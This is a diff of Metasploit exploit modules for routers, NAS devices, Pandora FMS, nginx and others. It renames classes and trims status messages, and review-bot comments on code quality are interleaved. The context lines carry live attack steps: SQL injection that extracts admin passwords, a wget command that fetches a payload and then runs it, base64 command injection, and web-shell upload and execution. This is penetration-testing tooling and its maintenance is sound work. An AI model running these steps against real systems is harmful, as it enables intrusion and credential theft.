@@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotVulnerable, "#{peer} - The SQLi cannot be exploited") unless check == Exploit::CheckCode::Vulnerable - print_status("#{peer} - Recovering the admin password with SQLi...") + print_status("Recovering the admin password with SQLi...") loot = base64_password fail_with(Failure::Unknown, "#{peer} - Failed to exploit the SQLi...") if loot.nil? @password = Rex::Text.decode_base64(loot) - print_good("#{peer} - Password recovered: #{@password}") + print_good("Password recovered: #{@password}") - print_status("#{peer} - Logging into the Control Panel...") + print_status("Logging into the Control Panel...") @session = send_login fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{@password} failed...") if @session.nil? @@ -130,11 +130,11 @@ class Metasploit3 < Msf::Exploit::Remote attempt_time: DateTime.now ) - print_status("#{peer} - Retrieving the server name...") + print_status("Retrieving the server name...") @server = server_info fail_with(Failure::NoAccess, "#{peer} - Login with admin/#{Rex::Text.decode_base64(base64_password)} failed...") if @server.nil? - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") send_command(payload.encoded) end @@ -252,14 +252,14 @@ class Metasploit3 < Msf::Exploit::Remote loot = '' until exploit_sqli(i, "\x00") - vprint_status("#{peer} - Bruteforcing position #{i}") + vprint_status("Bruteforcing position #{i}") c = brute_force_char(i) if c.nil? return nil else loot << c end - vprint_status("#{peer} - Found: #{loot}") + vprint_status("Found: #{loot}") i = i + 1 end @@ -297,7 +297,7 @@ class Metasploit3 < Msf::Exploit::Remote return false end - vprint_warning("#{peer} - Unknown fingerprint while exploiting SQLi... be careful") + vprint_warning("Unknown fingerprint while exploiting SQLi... be careful") false end 
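Review bot: In kloxo_sqli.rb hunk -130,11 the `fail_with` after `@server = server_info` reports "Login with admin/... failed" although the step that failed is the server-name lookup, and it builds that text by calling `base64_password` again instead of reading `@password`, which the previous hunk already set. Judging by the hunk at -252, that call appears to repeat the whole recovery just to format an error message. I would write `fail_with(Failure::NoAccess, "#{peer} - Unable to retrieve the server name") if @server.nil?`. `exploit` starts in the previous hunk.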
diff --git a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb index 35eace8ecb..05e87087a2 100644 --- a/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb +++ b/modules/exploits/linux/http/lifesize_uvc_ping_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index e46621bd2a..a51d2dbdd6 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb index c4d7219cd1..d2f717dc84 100644 --- a/modules/exploits/linux/http/linksys_e1500_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_e1500_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb index 1831de7645..57b9e6e986 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -109,13 +109,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager({:flavor => :echo}) end diff --git a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb index c8d41f7060..11ff4d4d9a 100644 --- a/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote )) register_options([ - OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']), + OptString.new('USERNAME', [ false, 'Valid router administrator username', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']), OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']), OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20]) diff --git a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb index 289ad49c36..11e0b35ccf 100644 --- a/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/tftp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
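Review bot: In linksys_wrt110_cmd_exec.rb hunk -43,7, `USERNAME` changes from required to optional, which is a behaviour change rather than part of the rename and print cleanup in the rest of this file, and nothing in the hunk explains it. With `false`, an operator can unset the option and `datastore['USERNAME']` is then nil; the code that builds the login request is outside the hunk, so confirm it tolerates that. A one-line comment above the option, e.g. `# USERNAME may be blank: <reason, not stated in this change>`, would record the intent. `register_options` continues outside the hunk.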
diff --git a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb index 34f3ec1421..fb0d1ca187 100644 --- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb +++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/multi_ncc_ping_exec.rb b/modules/exploits/linux/http/multi_ncc_ping_exec.rb index 67a93ba046..2006f04b3d 100644 --- a/modules/exploits/linux/http/multi_ncc_ping_exec.rb +++ b/modules/exploits/linux/http/multi_ncc_ping_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # Only tested on Emulated environment include Msf::Exploit::Remote::HttpClient @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") @pl = generate_payload_exe @payload_url = '' @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(cmd) if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/ 
@@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote def chmod_payload cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - chmod the payload...") + print_status("chmod the payload...") res = exec_command(cmd, 1) unless res @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = exec_command(cmd, 1) unless res diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index bd9cf31035..a80a737cb1 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -143,9 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options") end @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable Payload file") + print_status("Uploading executable Payload file") elf = payload.encoded_exe elf_location = "/tmp" elf_filename = "#{rand_text_alpha_lower(8)}.elf" 
@@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") jsp = jsp_execute_command("#{elf_location}/#{elf_filename}") jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m" jsp_filename = "#{rand_text_alpha_lower(8)}.jsp" @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "m", jsp_filename), diff --git a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb index e4c2587641..0d0c2e5fc9 100644 --- a/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb index 6052481e8b..41d72de2b9 100644 --- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb index 9fce52a1a5..9a4bc77e7a 100644 --- a/modules/exploits/linux/http/netgear_readynas_exec.rb +++ b/modules/exploits/linux/http/netgear_readynas_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit my_payload = "#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\")" - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_payload(my_payload) end diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index be5ae4c9c3..2add096256 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Exploit::Remote::Tcp @@ -85,7 +85,7 @@ class Metasploit4 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -213,16 +213,16 @@ class Metasploit4 < Msf::Exploit::Remote else if not datastore['CANARY'] == 0xffffffff - print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY']) + print_status("Using 0x%08x as stack canary" % datastore['CANARY']) canary = datastore['CANARY'] else - print_status("#{peer} - Searching for stack canary") + print_status("Searching for stack canary") canary = find_canary if canary.nil? || canary == 0x00000000 fail_with(Failure::Unknown, "#{peer} - Unable to find stack canary") else - print_good("#{peer} - Canary found: 0x%08x\n" % canary) + print_good("Canary found: 0x%08x\n" % canary) end end 
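Review bot: In nginx_chunked_size.rb hunk -213,16, `if not datastore['CANARY'] == 0xffffffff` relies on `not` binding looser than `==`, which is easy to misread; `if datastore['CANARY'] != 0xffffffff` says the same thing directly. The sentinel `0xffffffff` is also unexplained, and a comment such as `# 0xffffffff means no canary was supplied` would help if that is what it encodes (the option definition is outside the hunk). `print_good("Canary found: 0x%08x\n" % canary)` ends in `\n`, unlike the other messages in the file, which looks unintended. The enclosing method starts and ends outside the hunk.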
@@ -246,11 +246,11 @@ class Metasploit4 < Msf::Exploit::Remote # First byte of the canary is already known canary = "\x00" - print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00) + print_status("Assuming byte 0 0x%02x" % 0x00) # We are going to bruteforce the next 3 bytes one at a time 3.times do |c| - print_status("#{peer} - Bruteforcing byte #{c + 1}") + print_status("Bruteforcing byte #{c + 1}") 0.upto(255) do |i| data = random_chunk_size(1024) @@ -259,7 +259,7 @@ class Metasploit4 < Msf::Exploit::Remote data << i.chr unless send_request_fixed(data).nil? - print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i) + print_good("Byte #{c + 1} found: 0x%02x" % i) canary << i.chr break end diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index 782cd0a2e1..41d9e038ea 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from login page - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/' @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe 
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = Rex::Text.uri_encode("&#{payload.raw}&") # send payload - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/admin/system.html', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /System : Network Setup<\/title>/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/ fail_with(Failure::NoAccess, 'Authentication failed') else diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index 110c774531..0b4b436f0a 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) - print_status("#{peer} - Trying to escalate privileges to root") + print_status("Trying to escalate privileges to root") [ # ignore SIGHUP so the server doesn't kill our root shell "trap '' HUP", @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway") + print_status("Trying to detect Pandora FMS Remote Gateway") res = send_request_cgi({ 'method' => 'GET', @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway") - print_good("#{peer} - Pandora FMS Remote Gateway Detected!") + print_good("Pandora FMS Remote Gateway Detected!") return Exploit::CheckCode::Detected end 
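Review bot: `check` in pandora_fms_exec.rb (hunk -79,7) reports progress with `print_status` and, in the next hunk, `print_good`, while the `check` methods of openfiler_networkcard_exec.rb and pandora_fms_sqli.rb in this same diff use `vprint_status`. Since the change already touches these lines, switching them to `vprint_status("Trying to detect Pandora FMS Remote Gateway")` and `vprint_good("Pandora FMS Remote Gateway Detected!")` would keep check output quiet unless verbose output is on. `check` continues into the following hunks.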
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "/anyterm-module"), diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb index 070c50dd90..aed531b229 100644 --- a/modules/exploits/linux/http/pandora_fms_sqli.rb +++ b/modules/exploits/linux/http/pandora_fms_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") version = nil res = send_request_cgi({ @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end unless version.nil? - vprint_status("#{peer} - Pandora FMS #{version} found") + vprint_status("Pandora FMS #{version} found") if Gem::Version.new(version) <= Gem::Version.new('5.0SP2') return Exploit::CheckCode::Appears end @@ -120,13 +120,13 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_status("#{peer} - Extracted auto login password (#{password})") + print_status("Extracted auto login password (#{password})") else - print_error("#{peer} - No auto login password has been defined!") + print_error("No auto login password has been defined!") return false end - print_status("#{peer} - Attempting to authenticate using (admin:#{password})") + print_status("Attempting to authenticate using (admin:#{password})") # Attempt to login using login hash password res = send_request_cgi({ 'method' => 'POST', 
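Review bot: In pandora_fms_sqli.rb hunk -79,7, `Gem::Version.new(version)` raises `ArgumentError` when the string is not a well-formed version, and `version` comes from the remote response, so an unexpected page can abort `check` with an exception instead of a check code. The extraction sits between this hunk and the previous one and is not visible, so the risk depends on how strict that match is. Guarding the comparison, for example by rescuing `ArgumentError` around it and returning `Exploit::CheckCode::Unknown`, keeps the method's contract. `check` starts in the previous hunk and ends outside this one.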
@@ -146,17 +146,17 @@ class Metasploit3 < Msf::Exploit::Remote def auth_succeeded?(res) if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS') - print_status("#{peer} - Successfully authenticated!") - print_status("#{peer} - Attempting to retrieve session cookie") + print_status("Successfully authenticated!") + print_status("Attempting to retrieve session cookie") @cookie = res.get_cookies if @cookie.include?('PHPSESSID') - print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}") + print_status("Successfully retrieved session cookie: #{@cookie}") return true else - print_error("#{peer} - Error retrieving cookie!") + print_error("Error retrieving cookie!") end else - print_error("#{peer} - Authentication failed!") + print_error("Authentication failed!") end false @@ -177,9 +177,9 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]") + print_good("Extracted admin password hash, unsalted md5 - [ #{password} ]") else - print_error("#{peer} - Unable to extract password hash!") + print_error("Unable to extract password hash!") return false end end @@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote if match result = match[1] else - print_error("#{peer} - SQL injection failed") + print_error("SQL injection failed") end end result @@ -229,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/ hash = $1 else - print_error("#{peer} - Could not extract hash from response!") + print_error("Could not extract hash from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end 
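Review bot: In the `@@ -229,7` hunk of pandora_fms_sqli.rb the `print_error` line drops its `#{peer} - ` prefix, but the `fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")` directly below keeps it, so two messages for the same failure are now formatted differently. If the prefix is now added centrally for print_* calls (the commit suggests this, but no hunk shows it), check whether the failure message is printed through the same path and would then show the peer twice. If it is, `fail_with(Failure::Unknown, 'Unable to inject payload!')` is the consistent form. The same leftover prefix appears in the later hunks of this file and in the realtek, seagate, synology, vap2500 and zabbix modules; the method body extends beyond this hunk.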
@@ -237,7 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/ hash2 = $1 else - print_error("#{peer} - Could not extract hash2 from response!") + print_error("Could not extract hash2 from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -245,11 +245,11 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="real_directory" type="hidden" value=")(.*?)(" \/>)/ real_directory = $1 else - print_error("#{peer} - Could not extract real_directory from response!") + print_error("Could not extract real_directory from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end else - print_error("#{peer} - Could not identify upload form!") + print_error("Could not identify upload form!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -266,7 +266,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"') post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"') - print_status("#{peer} - Attempting to upload payload #{@payload_name}...") + print_status("Attempting to upload payload #{@payload_name}...") res = send_request_cgi({ 'method' => 'POST', 'cookie' => @cookie, @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.include?("Upload correct") register_file_for_cleanup(@payload_name) - print_status("#{peer} - Successfully uploaded payload") + print_status("Successfully uploaded payload") else fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end 
@@ -290,24 +290,24 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # First try to authenticate using default or user-supplied credentials - print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") + print_status("Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") auth = authenticate unless auth - print_status("#{peer} - Attempting to extract auto login hash via SQLi") + print_status("Attempting to extract auto login hash via SQLi") auth = login_hash end unless auth - print_status("#{peer} - Attempting to extract admin password hash with SQLi") + print_status("Attempting to extract admin password hash with SQLi") extract fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!") end - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") upload - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'images', @payload_name), diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 870ee7fdc1..c961f9bb31 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb index d9cab6a7a3..36c1176d0e 100644 --- a/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb +++ b/modules/exploits/linux/http/pineapp_ldapsyncnow_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/linux/http/pineapp_livelog_exec.rb b/modules/exploits/linux/http/pineapp_livelog_exec.rb index 94a67de146..935f34a251 100644 --- a/modules/exploits/linux/http/pineapp_livelog_exec.rb +++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb index 10111bb598..629e89b1ba 100644 --- a/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb +++ b/modules/exploits/linux/http/pineapp_test_li_conn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index bcb9e18bf2..2422a19bb5 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index d6a748c00f..281239a922 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # It's backdooring the remote device include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/linux/http/railo_cfml_rfi.rb b/modules/exploits/linux/http/railo_cfml_rfi.rb index c9d90752ab..4cf8418b8c 100644 --- a/modules/exploits/linux/http/railo_cfml_rfi.rb +++ b/modules/exploits/linux/http/railo_cfml_rfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb index 8806f177b8..059d0156d9 100644 --- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -82,13 +82,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb index 95759912b2..e3ec94f6bd 100644 --- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb +++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient 
